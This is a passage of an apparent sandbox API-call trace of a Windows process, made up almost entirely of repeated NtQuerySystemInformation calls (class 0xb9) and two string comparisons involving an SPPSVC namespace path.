(SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdec0, Length=0x28, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x28, ResultLength=0x0) [0228.157] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe080, Length=0x28, ResultLength=0x0) [0228.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x28, ResultLength=0x0) [0228.166] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe080, Length=0x28, ResultLength=0x0) [0228.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfb0, Length=0x50, ResultLength=0x0) [0228.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x50, ResultLength=0x0) [0228.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc00, Length=0x28, ResultLength=0x0) [0228.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc70, Length=0x28, ResultLength=0x0) [0228.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdcf0, Length=0x28, ResultLength=0x0) [0228.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.183] NtQuerySystemInformation 